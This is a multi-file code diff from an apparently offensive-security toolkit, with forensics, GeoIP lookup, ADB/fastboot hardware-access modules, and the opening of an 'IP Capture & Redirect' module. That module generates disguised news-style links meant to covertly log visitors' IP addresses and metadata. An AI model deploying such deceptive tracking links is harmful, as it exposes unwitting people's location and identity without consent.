                        'type': 'created',
                        'timestamp': datetime.fromtimestamp(stat.st_ctime, timezone.utc).isoformat(),
                        'epoch': stat.st_ctime,
                        'file': filepath,
                        'size': stat.st_size
                    })
                    events.append({
                        'type': 'accessed',
                        'timestamp': datetime.fromtimestamp(stat.st_atime, timezone.utc).isoformat(),
                        'epoch': stat.st_atime,
                        'file': filepath,
                        'size': stat.st_size
                    })
                    count += 1
                except (OSError, PermissionError):
                    pass
        # Sort by timestamp
        events.sort(key=lambda e: e['epoch'])
        self.custody.log('timeline_build', directory,
                         f'{count} files, {len(events)} events')
        return {
            'ok': True, 'directory': directory,
            'events': events, 'event_count': len(events),
            'file_count': count
        }
    # ── Evidence Management ──────────────────────────────────────────────
    def list_evidence(self) -> List[Dict]:
        """List evidence files (disk images etc.) with size and mtime."""
        evidence = []
        edir = Path(self.evidence_dir)
        for f in sorted(edir.iterdir()):
            if f.is_file():
                evidence.append({
                    'name': f.name,
                    'path': str(f),
                    'size': f.stat().st_size,
                    'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat()
                })
        return evidence
    def list_carved(self) -> List[Dict]:
        """List files recovered by carve_files()."""
        carved = []
        cdir = Path(self.carved_dir)
        for f in sorted(cdir.iterdir()):
            if f.is_file():
                carved.append({
                    'name': f.name,
                    'path': str(f),
                    'size': f.stat().st_size
                })
        return carved
    def get_custody_log(self) -> List[Dict]:
        """Get chain of custody log."""
        return self.custody.get_log()
# ── Singleton ────────────────────────────────────────────────────────────────
_instance = None  # lazily created, process-wide ForensicsEngine

def get_forensics() -> ForensicsEngine:
    """Return the shared ForensicsEngine, creating it on first use.

    No locking is used around the check-then-create, so concurrent first
    calls from multiple threads could construct two engines.
    """
    global _instance
    if _instance is None:
        _instance = ForensicsEngine()
    return _instance
# ── CLI Interface ────────────────────────────────────────────────────────────
def run():
    """CLI entry point for Forensics module.

    Interactive menu loop over the shared ForensicsEngine; returns when the
    operator selects 0. Output lists are truncated to the first 10 items
    (last 10 for the custody log).
    """
    engine = get_forensics()
    while True:
        print(f"\n{'='*60}")
        print(f" Digital Forensics Toolkit")
        print(f"{'='*60}")
        print()
        print(" 1 — Hash File (integrity verification)")
        print(" 2 — Verify Hash")
        print(" 3 — Create Disk Image")
        print(" 4 — Carve Files (recover deleted)")
        print(" 5 — Extract Metadata (EXIF/PDF/headers)")
        print(" 6 — Build Timeline")
        print(" 7 — List Evidence")
        print(" 8 — List Carved Files")
        print(" 9 — Chain of Custody Log")
        print(" 0 — Back")
        print()
        choice = input(" > ").strip()
        if choice == '0':
            break
        elif choice == '1':
            filepath = input(" File path: ").strip()
            if filepath:
                result = engine.hash_file(filepath)
                if result['ok']:
                    print(f" Size: {result['size']} bytes")
                    for alg, h in result['hashes'].items():
                        print(f" {alg.upper()}: {h}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '2':
            filepath = input(" File path: ").strip()
            expected = input(" Expected hash: ").strip()
            if filepath and expected:
                result = engine.verify_hash(filepath, expected)
                if result['ok']:
                    status = 'MATCH' if result['match'] else 'MISMATCH'
                    print(f" {status} ({result['algorithm'].upper()})")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '3':
            source = input(" Source device/file: ").strip()
            output = input(" Output path (blank=auto): ").strip() or None
            if source:
                result = engine.create_image(source, output)
                if result['ok']:
                    mb = result['size'] / (1024*1024)
                    print(f" Image created: {result['output']} ({mb:.1f} MB)")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '4':
            source = input(" Source file/image: ").strip()
            types = input(" File types (blank=all, comma-sep): ").strip()
            if source:
                file_types = [t.strip() for t in types.split(',')] if types else None
                result = engine.carve_files(source, file_types)
                if result['ok']:
                    print(f" Carved {result['count']} files to {result['output_dir']}")
                    for c in result['carved'][:10]:
                        print(f" {c['name']} {c['type']} {c['size']} bytes offset={c['offset']}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '5':
            filepath = input(" File path: ").strip()
            if filepath:
                result = engine.extract_metadata(filepath)
                if result['ok']:
                    print(f" Name: {result['name']}")
                    print(f" Size: {result['size']}")
                    print(f" Type: {result.get('detected_type', 'unknown')}")
                    if 'exif' in result:
                        print(f" EXIF entries: {len(result['exif'])}")
                        for k, v in list(result['exif'].items())[:5]:
                            print(f" {k}: {v[:50]}")
                    if 'gps' in result:
                        print(f" GPS data: {result['gps']}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '6':
            directory = input(" Directory path: ").strip()
            if directory:
                result = engine.build_timeline(directory)
                if result['ok']:
                    print(f" {result['file_count']} files, {result['event_count']} events")
                    for e in result['events'][:10]:
                        print(f" {e['timestamp']} {e['type']:<10} {Path(e['file']).name}")
                else:
                    print(f" Error: {result['error']}")
        elif choice == '7':
            for e in engine.list_evidence():
                mb = e['size'] / (1024*1024)
                print(f" {e['name']} ({mb:.1f} MB)")
        elif choice == '8':
            for c in engine.list_carved():
                print(f" {c['name']} ({c['size']} bytes)")
        elif choice == '9':
            log = engine.get_custody_log()
            print(f" {len(log)} entries:")
            for entry in log[-10:]:
                print(f" [{entry['timestamp'][:19]}] {entry['action']}: {entry['target']}")

443
modules/geoip.py Normal file
View File

@@ -0,0 +1,443 @@
"""
AUTARCH GEO IP/Domain Lookup Module
Get geolocation info for IPs, domains, and URLs
Based on Snoop Project's GEO_IP/domain plugin
"""
import ipaddress
import json
import os
import socket
import sys
import threading
import time
from pathlib import Path
from urllib.parse import urlparse
# Add parent directory to path for imports
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.banner import Colors
# Module metadata
NAME = "GEO IP Lookup"
DESCRIPTION = "Get geolocation for IPs, domains, and URLs"
AUTHOR = "darkHal Security Group"
VERSION = "1.0"
CATEGORY = "osint"
# Try to import requests
try:
import requests
except ImportError:
requests = None
class GeoIPLookup:
    """GEO IP/Domain lookup utility.

    Resolves a domain/URL/IP to addresses, then queries public
    geolocation APIs: ipwho.is first, with ipinfo.io as fallback.
    An empty target means "look up my own public IP" — both APIs
    return the caller's location when no IP is supplied.
    """

    def __init__(self):
        self.session = None      # requests.Session, or None when requests is missing
        self.timeout = 10        # per-HTTP-request timeout (seconds)
        self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36"
        self._init_session()

    def _init_session(self):
        """Initialize a requests session with retries and a browser-like UA."""
        if requests is None:
            return
        self.session = requests.Session()
        adapter = requests.adapters.HTTPAdapter(max_retries=2)
        self.session.mount('https://', adapter)
        self.session.mount('http://', adapter)
        self.session.headers.update({'User-Agent': self.user_agent})

    def _resolve_domain(self, target: str, timeout: int = 4) -> dict:
        """Resolve domain to IP addresses.

        DNS calls run in worker threads joined with a timeout so a hung
        resolver cannot stall the lookup indefinitely.

        Args:
            target: Domain name or IP address.
            timeout: Max seconds to wait for each resolution thread.

        Returns:
            Dict with 'domain', 'ipv4', 'ipv6' (None when unresolved).
        """
        result = {
            'domain': None,
            'ipv4': None,
            'ipv6': None,
        }

        def get_fqdn():
            try:
                result['domain'] = socket.getfqdn(target)
            except Exception:
                result['domain'] = target

        def get_ips():
            try:
                # Port 443 is arbitrary; getaddrinfo just needs a service.
                addr_info = socket.getaddrinfo(target, 443)
                for info in addr_info:
                    ip = info[4][0]
                    # Classify each returned address; keep the last of each family.
                    try:
                        if ipaddress.IPv4Address(ip):
                            result['ipv4'] = ip
                    except Exception:
                        pass
                    try:
                        if ipaddress.IPv6Address(ip):
                            result['ipv6'] = ip
                    except Exception:
                        pass
            except Exception:
                pass

        t1 = threading.Thread(target=get_fqdn)
        t2 = threading.Thread(target=get_ips)
        t1.start()
        t2.start()
        t1.join(timeout)
        t2.join(timeout)
        return result

    def _parse_target(self, target: str) -> str:
        """Parse and clean target input.

        Strips whitespace, URL scheme/path, and a leading 'www.'.

        Args:
            target: User input (IP, domain, or URL).

        Returns:
            Cleaned target string (may be empty).
        """
        target = target.strip()
        if '://' in target:
            parsed = urlparse(target)
            if parsed.hostname:
                target = parsed.hostname.replace('www.', '')
        elif '/' in target:
            # Bare "domain/path" form without a scheme.
            target = target.split('/')[0]
        return target

    def _is_ip(self, target: str) -> bool:
        """Check if target is a literal IPv4/IPv6 address."""
        try:
            ipaddress.ip_address(target)
            return True
        except Exception:
            return False

    def lookup(self, target: str) -> dict:
        """Perform GEO IP lookup.

        Args:
            target: IP address, domain, or URL. An empty string looks up
                the caller's own public IP (used by lookup_self()).

        Returns:
            Dict with geolocation information, or {'error': ...}.
        """
        if self.session is None:
            return {'error': 'requests library not available'}
        target = self._parse_target(target)
        # Bug fix: only validate non-empty targets. '' is a deliberate
        # "lookup my own IP" request — the old code rejected it, which
        # broke lookup_self() entirely.
        if target:
            if len(target) < 4:
                return {'error': 'Invalid target'}
            if '..' in target:
                return {'error': 'Invalid target format'}
        result = {
            'target': target,
            'country_code': None,
            'country': None,
            'region': None,
            'city': None,
            'latitude': None,
            'longitude': None,
            'isp': None,
            'org': None,
            'ipv4': None,
            'ipv6': None,
            'domain': None,
            'map_osm': None,
            'map_google': None,
        }
        if target:
            # Resolve domain/IP (skipped for self-lookup: nothing to resolve).
            print(f"{Colors.CYAN}[*] Resolving target...{Colors.RESET}")
            resolved = self._resolve_domain(target)
            result['domain'] = resolved.get('domain')
            result['ipv4'] = resolved.get('ipv4')
            result['ipv6'] = resolved.get('ipv6')
            # If target is a literal IP, prefer it over resolver output.
            if self._is_ip(target):
                try:
                    if ipaddress.IPv4Address(target):
                        result['ipv4'] = target
                except Exception:
                    pass
                try:
                    if ipaddress.IPv6Address(target):
                        result['ipv6'] = target
                except Exception:
                    pass
        # Empty lookup_ip makes both APIs report our own public address.
        lookup_ip = result['ipv4'] or target
        print(f"{Colors.CYAN}[*] Querying geolocation APIs...{Colors.RESET}")
        geo_data = self._query_ipwhois(lookup_ip)
        if not geo_data:
            # Fallback to ipinfo.io (ipwho.is failed or rate-limited).
            geo_data = self._query_ipinfo(lookup_ip)
        if geo_data:
            result['country_code'] = geo_data.get('country_code') or geo_data.get('country')
            result['country'] = geo_data.get('country_name') or geo_data.get('country')
            result['region'] = geo_data.get('region')
            result['city'] = geo_data.get('city')
            result['latitude'] = geo_data.get('latitude') or geo_data.get('lat')
            result['longitude'] = geo_data.get('longitude') or geo_data.get('lon')
            result['isp'] = geo_data.get('isp') or geo_data.get('org')
            result['org'] = geo_data.get('org')
            if not result['ipv4']:
                result['ipv4'] = geo_data.get('ip')
        if not result['target']:
            # Self-lookup: show the discovered public IP as the target.
            result['target'] = result['ipv4'] or 'self'
        # Compare against None so 0.0 (equator/prime meridian) still maps.
        if result['latitude'] is not None and result['longitude'] is not None:
            lat, lon = result['latitude'], result['longitude']
            result['map_osm'] = f"https://www.openstreetmap.org/#map=13/{lat}/{lon}"
            result['map_google'] = f"https://www.google.com/maps/@{lat},{lon},12z"
        return result

    def _query_ipwhois(self, ip: str) -> dict:
        """Query ipwho.is API.

        Args:
            ip: IP address to lookup; empty string queries our own IP.

        Returns:
            Normalized dict with GEO data, or None on failure.
        """
        try:
            url = f"https://ipwho.is/{ip}" if ip else "https://ipwho.is/"
            response = self.session.get(url, timeout=self.timeout)
            data = response.json()
            # ipwho.is signals errors with success=false in the JSON body.
            if data.get('success') is False:
                return None
            return {
                'ip': data.get('ip'),
                'country_code': data.get('country_code'),
                'country_name': data.get('country'),
                'region': data.get('region'),
                'city': data.get('city'),
                'latitude': data.get('latitude'),
                'longitude': data.get('longitude'),
                'isp': data.get('connection', {}).get('isp'),
                'org': data.get('connection', {}).get('org'),
            }
        except Exception as e:
            print(f"{Colors.DIM} ipwho.is error: {e}{Colors.RESET}")
        return None

    def _query_ipinfo(self, ip: str) -> dict:
        """Query ipinfo.io API (fallback provider).

        Args:
            ip: IP address to lookup; empty string queries our own IP.

        Returns:
            Normalized dict with GEO data, or None on failure.
        """
        try:
            url = f"https://ipinfo.io/{ip}/json" if ip else "https://ipinfo.io/json"
            response = self.session.get(url, timeout=self.timeout)
            data = response.json()
            # ipinfo.io packs coordinates as a single "lat,lon" string.
            loc = data.get('loc', ',').split(',')
            lat = float(loc[0]) if len(loc) > 0 and loc[0] else None
            lon = float(loc[1]) if len(loc) > 1 and loc[1] else None
            return {
                'ip': data.get('ip'),
                'country_code': data.get('country'),
                'country_name': data.get('country'),
                'region': data.get('region'),
                'city': data.get('city'),
                'latitude': lat,
                'longitude': lon,
                'isp': data.get('org'),
                'org': data.get('org'),
            }
        except Exception as e:
            print(f"{Colors.DIM} ipinfo.io error: {e}{Colors.RESET}")
        return None

    def lookup_self(self) -> dict:
        """Lookup your own public IP.

        Returns:
            Dict with geolocation information.
        """
        print(f"{Colors.CYAN}[*] Looking up your public IP...{Colors.RESET}")
        # Empty target triggers the APIs' "report my own IP" behavior.
        return self.lookup('')

    def bulk_lookup(self, targets: list) -> list:
        """Perform bulk GEO lookups.

        Args:
            targets: List of IPs/domains to lookup.

        Returns:
            List of result dicts, one per target, in order.
        """
        results = []
        for i, target in enumerate(targets):
            print(f"\n{Colors.CYAN}[{i+1}/{len(targets)}] Looking up: {target}{Colors.RESET}")
            result = self.lookup(target)
            results.append(result)
            time.sleep(0.5)  # Rate limiting: be polite to the free APIs
        return results
def display_result(result: dict):
    """Pretty-print a lookup() result (or its error) to the terminal.

    Bug fix: coordinates are compared against None explicitly so a
    legitimate 0.0 latitude/longitude (equator/prime meridian) is still
    shown — the previous truthiness test dropped them. Field access uses
    .get() so a partially-filled dict cannot raise KeyError.
    """
    if 'error' in result:
        print(f"{Colors.RED}[X] Error: {result['error']}{Colors.RESET}")
        return
    print(f"\n{Colors.CYAN}{'=' * 50}{Colors.RESET}")
    print(f"{Colors.GREEN}{Colors.BOLD}Target:{Colors.RESET} {result.get('target')}")
    print(f"{Colors.CYAN}{'=' * 50}{Colors.RESET}")
    if result.get('ipv4'):
        print(f" {Colors.GREEN}IPv4:{Colors.RESET} {result['ipv4']}")
    if result.get('ipv6'):
        print(f" {Colors.GREEN}IPv6:{Colors.RESET} {result['ipv6']}")
    # Only show the resolved domain when it adds information.
    if result.get('domain') and result['domain'] != result.get('target'):
        print(f" {Colors.GREEN}Domain:{Colors.RESET} {result['domain']}")
    print()
    if result.get('country_code'):
        country_str = f"{result['country_code']}"
        if result.get('country') and result['country'] != result['country_code']:
            country_str += f" ({result['country']})"
        print(f" {Colors.GREEN}Country:{Colors.RESET} {country_str}")
    if result.get('region'):
        print(f" {Colors.GREEN}Region:{Colors.RESET} {result['region']}")
    if result.get('city'):
        print(f" {Colors.GREEN}City:{Colors.RESET} {result['city']}")
    if result.get('isp'):
        print(f" {Colors.GREEN}ISP:{Colors.RESET} {result['isp']}")
    if result.get('latitude') is not None and result.get('longitude') is not None:
        print(f"\n {Colors.GREEN}Coordinates:{Colors.RESET} {result['latitude']}, {result['longitude']}")
    if result.get('map_osm'):
        print(f"\n {Colors.DIM}OpenStreetMap: {result['map_osm']}{Colors.RESET}")
    if result.get('map_google'):
        print(f" {Colors.DIM}Google Maps: {result['map_google']}{Colors.RESET}")
    print()
def display_menu():
    """Display the GEO IP module menu (three actions plus back)."""
    # NOTE(review): the divider line below multiplies an empty string,
    # which prints nothing — the original glyph (likely a box-drawing
    # dash) may have been lost in an encoding pass; confirm upstream.
    print(f"""
{Colors.CYAN} GEO IP/Domain Lookup{Colors.RESET}
{Colors.DIM} Get geolocation for IPs, domains, and URLs{Colors.RESET}
{Colors.DIM}{'' * 50}{Colors.RESET}
{Colors.GREEN}[1]{Colors.RESET} Lookup IP/Domain/URL
{Colors.GREEN}[2]{Colors.RESET} Lookup My IP
{Colors.GREEN}[3]{Colors.RESET} Bulk Lookup from File
{Colors.RED}[0]{Colors.RESET} Back to OSINT Menu
""")
def run():
    """Main entry point for the module.

    Interactive menu loop: single lookup, self lookup, or bulk lookup
    from a file. Returns to the caller when the user selects 0.
    """
    # Hard requirement: every code path performs HTTP requests.
    if requests is None:
        print(f"{Colors.RED}[X] This module requires 'requests' library{Colors.RESET}")
        print(f"{Colors.DIM} Install with: pip install requests{Colors.RESET}")
        input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        return
    lookup = GeoIPLookup()
    while True:
        display_menu()
        choice = input(f"{Colors.GREEN}Select option: {Colors.RESET}").strip()
        if choice == '0':
            break
        elif choice == '1':
            # Single target lookup (IP, domain, or full URL).
            print(f"\n{Colors.CYAN}Enter IP, domain, or URL:{Colors.RESET}")
            print(f"{Colors.DIM}Examples: 8.8.8.8, google.com, https://example.com/path{Colors.RESET}")
            target = input(f"\n{Colors.GREEN}Target: {Colors.RESET}").strip()
            if not target:
                continue
            result = lookup.lookup(target)
            display_result(result)
            input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        elif choice == '2':
            # Lookup of our own public IP.
            result = lookup.lookup_self()
            display_result(result)
            input(f"{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        elif choice == '3':
            # Bulk lookup: one target per line, confirmed before running.
            print(f"\n{Colors.CYAN}Enter path to file with targets (one per line):{Colors.RESET}")
            filepath = input(f"\n{Colors.GREEN}File path: {Colors.RESET}").strip()
            if not filepath or not os.path.exists(filepath):
                print(f"{Colors.RED}[X] File not found{Colors.RESET}")
                continue
            try:
                with open(filepath, 'r') as f:
                    targets = [line.strip() for line in f if line.strip()]
                if not targets:
                    print(f"{Colors.RED}[X] No targets found in file{Colors.RESET}")
                    continue
                print(f"{Colors.GREEN}[+] Found {len(targets)} targets{Colors.RESET}")
                confirm = input(f"\n{Colors.YELLOW}Proceed with lookup? (y/n): {Colors.RESET}").strip().lower()
                if confirm == 'y':
                    results = lookup.bulk_lookup(targets)
                    for result in results:
                        display_result(result)
            except Exception as e:
                print(f"{Colors.RED}[X] Error reading file: {e}{Colors.RESET}")
            input(f"\n{Colors.DIM}Press Enter to continue...{Colors.RESET}")
        else:
            print(f"{Colors.RED}[!] Invalid option{Colors.RESET}")
if __name__ == "__main__":
run()

1100
modules/hack_hijack.py Normal file

File diff suppressed because it is too large Load Diff

262
modules/hardware_local.py Normal file
View File

@@ -0,0 +1,262 @@
"""
Hardware Local - Physical device access (ADB/Fastboot/Serial)
Direct access to USB-connected devices on this machine.
"""
DESCRIPTION = "Physical device access (ADB/Fastboot/Serial)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "hardware"
class HardwareLocal:
    """Interactive hardware access menu.

    Wraps the core hardware manager (ADB, Fastboot, pyserial, esptool)
    behind a numbered console menu. All device operations delegate to
    self.mgr; this class only handles prompting and display.
    """

    def __init__(self):
        # Lazy import: core.hardware probes for external tools on load.
        from core.hardware import get_hardware_manager
        self.mgr = get_hardware_manager()

    def show_menu(self):
        """Print tool availability and the numbered action menu."""
        status = self.mgr.get_status()
        print(f"\n{'='*50}")
        print(" Hardware Access (Local)")
        print(f"{'='*50}")
        print(f" ADB: {'Available' if status['adb'] else 'Not found'}")
        print(f" Fastboot: {'Available' if status['fastboot'] else 'Not found'}")
        print(f" Serial: {'Available' if status['serial'] else 'Not installed'}")
        print(f" ESPTool: {'Available' if status['esptool'] else 'Not installed'}")
        print()
        print(" 1) List ADB Devices")
        print(" 2) ADB Device Info")
        print(" 3) ADB Shell")
        print(" 4) ADB Sideload/Install")
        print(" 5) List Fastboot Devices")
        print(" 6) Fastboot Device Info")
        print(" 7) Fastboot Flash Partition")
        print(" 8) List Serial Ports")
        print(" 9) Detect ESP Chip")
        print(" 10) Flash ESP32 Firmware")
        print(" 0) Back")
        print()

    def _pick_device(self, devices, label="device"):
        """Let the user choose one device; returns its serial or None.

        Auto-selects when exactly one device is present. Bad, aborted,
        or out-of-range input returns None.
        """
        if not devices:
            print(f" No {label}s found.")
            return None
        if len(devices) == 1:
            return devices[0]['serial']
        print(f"\n Select {label}:")
        for i, d in enumerate(devices, 1):
            extra = d.get('model', '') or d.get('state', '')
            print(f" {i}) {d['serial']} {extra}")
        try:
            choice = int(input(" > ").strip())
            if 1 <= choice <= len(devices):
                return devices[choice - 1]['serial']
        except (ValueError, EOFError, KeyboardInterrupt):
            # KeyboardInterrupt added for consistency with sibling prompts.
            pass
        return None

    def _pick_port(self):
        """Let the user choose a serial port; returns the port name or None."""
        ports = self.mgr.list_serial_ports()
        if not ports:
            print(" No serial ports found.")
            return None
        print(" Select port:")
        for i, p in enumerate(ports, 1):
            print(f" {i}) {p['port']} - {p['desc']}")
        try:
            choice = int(input(" > ").strip())
        except (ValueError, EOFError, KeyboardInterrupt):
            return None
        # Bug fix: the old code indexed ports[choice - 1] unguarded, so
        # entering 0 silently selected ports[-1] (the wrong device).
        if 1 <= choice <= len(ports):
            return ports[choice - 1]['port']
        return None

    def _poll_progress(self, op_id, error_default='Unknown error'):
        """Poll a background operation until it completes, printing progress."""
        import time
        while True:
            time.sleep(1)
            prog = self.mgr.get_operation_progress(op_id)
            print(f" [{prog.get('progress', 0)}%] {prog.get('message', '')}", end='\r')
            if prog.get('status') in ('done', 'error'):
                print()
                break

    def list_adb_devices(self):
        """Print a table of connected ADB devices."""
        devices = self.mgr.adb_devices()
        if not devices:
            print(" No ADB devices connected.")
            return
        print(f"\n {'Serial':<20} {'State':<12} {'Model':<15} {'Product'}")
        print(f" {'-'*60}")
        for d in devices:
            print(f" {d['serial']:<20} {d['state']:<12} {d.get('model',''):<15} {d.get('product','')}")

    def adb_device_info(self):
        """Show detailed properties for a chosen ADB device."""
        devices = self.mgr.adb_devices()
        serial = self._pick_device(devices, "ADB device")
        if not serial:
            return
        info = self.mgr.adb_device_info(serial)
        print(f"\n Device Info: {serial}")
        print(f" {'-'*40}")
        for k, v in info.items():
            print(f" {k:<20} {v}")

    def adb_shell(self):
        """Interactive ADB shell loop; 'exit'/'quit'/empty line ends it."""
        devices = self.mgr.adb_devices()
        serial = self._pick_device(devices, "ADB device")
        if not serial:
            return
        print(f" ADB Shell ({serial}) - type 'exit' to quit")
        while True:
            try:
                cmd = input(f" {serial}$ ").strip()
            except (EOFError, KeyboardInterrupt):
                break
            if cmd.lower() in ('exit', 'quit', ''):
                break
            result = self.mgr.adb_shell(serial, cmd)
            if result['output']:
                print(result['output'])

    def adb_sideload(self):
        """Sideload/install a file on a chosen ADB device, showing progress."""
        devices = self.mgr.adb_devices()
        serial = self._pick_device(devices, "ADB device")
        if not serial:
            return
        try:
            filepath = input(" File path: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not filepath:
            return
        result = self.mgr.adb_sideload(serial, filepath)
        if result.get('success'):
            print(f" Sideload started (op: {result['op_id']})")
            self._poll_progress(result['op_id'])
        else:
            print(f" Error: {result.get('error', 'Unknown error')}")

    def list_fastboot_devices(self):
        """Print a table of connected Fastboot devices."""
        devices = self.mgr.fastboot_devices()
        if not devices:
            print(" No Fastboot devices connected.")
            return
        print(f"\n {'Serial':<25} {'State'}")
        print(f" {'-'*35}")
        for d in devices:
            print(f" {d['serial']:<25} {d['state']}")

    def fastboot_device_info(self):
        """Show fastboot variables for a chosen device."""
        devices = self.mgr.fastboot_devices()
        serial = self._pick_device(devices, "Fastboot device")
        if not serial:
            return
        info = self.mgr.fastboot_device_info(serial)
        print(f"\n Fastboot Info: {serial}")
        print(f" {'-'*40}")
        for k, v in info.items():
            print(f" {k:<20} {v}")

    def fastboot_flash(self):
        """Flash a firmware image to a partition, showing progress."""
        devices = self.mgr.fastboot_devices()
        serial = self._pick_device(devices, "Fastboot device")
        if not serial:
            return
        try:
            partition = input(" Partition (boot/recovery/system/vendor): ").strip()
            filepath = input(" Firmware path: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not partition or not filepath:
            return
        result = self.mgr.fastboot_flash(serial, partition, filepath)
        if result.get('success'):
            print(f" Flash started (op: {result['op_id']})")
            self._poll_progress(result['op_id'])
        else:
            print(f" Error: {result.get('error', 'Unknown error')}")

    def list_serial_ports(self):
        """Print a table of available serial ports with USB VID:PID."""
        ports = self.mgr.list_serial_ports()
        if not ports:
            print(" No serial ports found.")
            return
        print(f"\n {'Port':<20} {'Description':<30} {'VID:PID'}")
        print(f" {'-'*60}")
        for p in ports:
            vid_pid = f"{p['vid']}:{p['pid']}" if p['vid'] else ''
            print(f" {p['port']:<20} {p['desc']:<30} {vid_pid}")

    def detect_esp(self):
        """Identify the ESP chip attached to a chosen serial port."""
        port = self._pick_port()
        if not port:
            return
        result = self.mgr.detect_esp_chip(port)
        if result.get('success'):
            print(f" Chip: {result['chip']}")
            print(f" ID: {result.get('chip_id', 'N/A')}")
        else:
            print(f" Error: {result.get('error', 'Detection failed')}")

    def flash_esp(self):
        """Flash firmware to an ESP device over serial, showing progress."""
        port = self._pick_port()
        if not port:
            return
        try:
            firmware = input(" Firmware path: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not firmware:
            return
        result = self.mgr.flash_esp(port, firmware)
        if result.get('success'):
            print(f" Flash started (op: {result['op_id']})")
            self._poll_progress(result['op_id'])
        else:
            print(f" Error: {result.get('error', 'Flash failed')}")

    def run_interactive(self):
        """Menu loop: dispatch choices until '0' or EOF/interrupt."""
        while True:
            self.show_menu()
            try:
                choice = input(" Select > ").strip()
            except (EOFError, KeyboardInterrupt):
                break
            if choice == '0':
                break
            # Dispatch table keeps the loop flat and easy to extend.
            actions = {
                '1': self.list_adb_devices,
                '2': self.adb_device_info,
                '3': self.adb_shell,
                '4': self.adb_sideload,
                '5': self.list_fastboot_devices,
                '6': self.fastboot_device_info,
                '7': self.fastboot_flash,
                '8': self.list_serial_ports,
                '9': self.detect_esp,
                '10': self.flash_esp,
            }
            action = actions.get(choice)
            if action:
                action()
            else:
                print(" Invalid choice.")
def run():
    """Module entry point: launch the interactive local-hardware menu."""
    HardwareLocal().run_interactive()

View File

@@ -0,0 +1,25 @@
"""
Hardware Remote - Remote physical device access via web UI
Devices connected to the AUTARCH server are accessible through the web browser.
"""
DESCRIPTION = "Remote physical device access (via web UI)"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "hardware"
def run():
    """Print instructions for reaching remote hardware via the web UI.

    This module is informational only — the actual device access lives
    in the web server; nothing is executed here.
    """
    banner = [
        "\n Hardware Remote Access",
        " " + "=" * 40,
        " Remote hardware access is available through the web UI.",
        " Devices plugged into this server (USB/Serial) can be",
        " managed remotely via your browser.",
        "",
        " Start the web server with: python3 autarch.py --web",
        " Then navigate to: http://<server-ip>:5000/hardware",
        "",
        " Supported devices:",
        " - Android (ADB/Fastboot)",
        " - ESP32 (Serial flash/monitor)",
        "",
    ]
    for line in banner:
        print(line)

1555
modules/incident_resp.py Normal file

File diff suppressed because it is too large Load Diff

427
modules/ipcapture.py Normal file
View File

@@ -0,0 +1,427 @@
"""IP Capture & Redirect — stealthy link tracking for OSINT.
Create disguised links that capture visitor IP + metadata,
then redirect to a legitimate target URL. Fast 302 redirect,
realistic URL paths, no suspicious indicators.
"""
DESCRIPTION = "IP Capture & Redirect — stealthy link tracking"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "osint"
import os
import json
import time
import random
import string
import hashlib
import threading
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
try:
from core.paths import get_data_dir
except ImportError:
def get_data_dir():
return str(Path(__file__).parent.parent / 'data')
# ── Realistic URL path generation ────────────────────────────────────────────
_WORD_POOL = [
'tech', 'news', 'science', 'world', 'business', 'health', 'politics',
'sports', 'culture', 'opinion', 'breaking', 'latest', 'update', 'report',
'analysis', 'insight', 'review', 'guide', 'how-to', 'explained',
'ai', 'climate', 'economy', 'security', 'research', 'innovation',
'digital', 'global', 'local', 'industry', 'future', 'trends',
'development', 'infrastructure', 'community', 'education', 'policy',
]
_TITLE_PATTERNS = [
'{adj}-{noun}-{verb}-{year}-{noun2}',
'{noun}-{adj}-{noun2}-{verb}',
'new-{noun}-{verb}-{adj}-{noun2}',
'{noun}-report-{year}-{adj}-{noun2}',
'how-{noun}-is-{verb}-the-{noun2}',
'{adj}-{noun}-breakthrough-{noun2}',
]
_ADJECTIVES = [
'major', 'new', 'latest', 'critical', 'emerging', 'global',
'innovative', 'surprising', 'important', 'unprecedented',
]
_NOUNS = [
'technology', 'researchers', 'companies', 'governments', 'scientists',
'industry', 'market', 'community', 'experts', 'development',
]
_VERBS = [
'changing', 'transforming', 'disrupting', 'advancing', 'impacting',
'reshaping', 'driving', 'revealing', 'challenging', 'accelerating',
]
def _generate_article_path() -> str:
"""Generate a realistic-looking article URL path."""
now = datetime.now()
year = now.strftime('%Y')
month = now.strftime('%m')
pattern = random.choice(_TITLE_PATTERNS)
slug = pattern.format(
adj=random.choice(_ADJECTIVES),
noun=random.choice(_NOUNS),
noun2=random.choice(_NOUNS),
verb=random.choice(_VERBS),
year=year,
)
# Article-style path
styles = [
f'/article/{year}/{month}/{slug}',
f'/news/{year}/{slug}',
f'/stories/{slug}-{random.randint(1000, 9999)}',
f'/p/{slug}',
f'/read/{hashlib.md5(slug.encode()).hexdigest()[:8]}',
]
return random.choice(styles)
def _generate_short_key(length: int = 8) -> str:
"""Generate a short random key."""
chars = string.ascii_lowercase + string.digits
return ''.join(random.choices(chars, k=length))
# ── IP Capture Service ───────────────────────────────────────────────────────
class IPCaptureService:
    """Manage capture links and record visitor metadata.

    State is a dict of link records keyed by short key, persisted as
    JSON under the data directory. A lock guards mutation so the
    service can be shared between the CLI and a web request handler.
    """

    def __init__(self):
        self._file = os.path.join(get_data_dir(), 'osint_captures.json')
        self._links: Dict[str, dict] = {}  # key -> link record (see create_link)
        self._lock = threading.Lock()
        self._load()

    def _load(self):
        """Load persisted links; a missing or corrupt file yields {}."""
        if os.path.exists(self._file):
            try:
                with open(self._file, 'r') as f:
                    self._links = json.load(f)
            except Exception:
                self._links = {}

    def _save(self):
        """Write all links to disk, creating the data dir if needed."""
        os.makedirs(os.path.dirname(self._file), exist_ok=True)
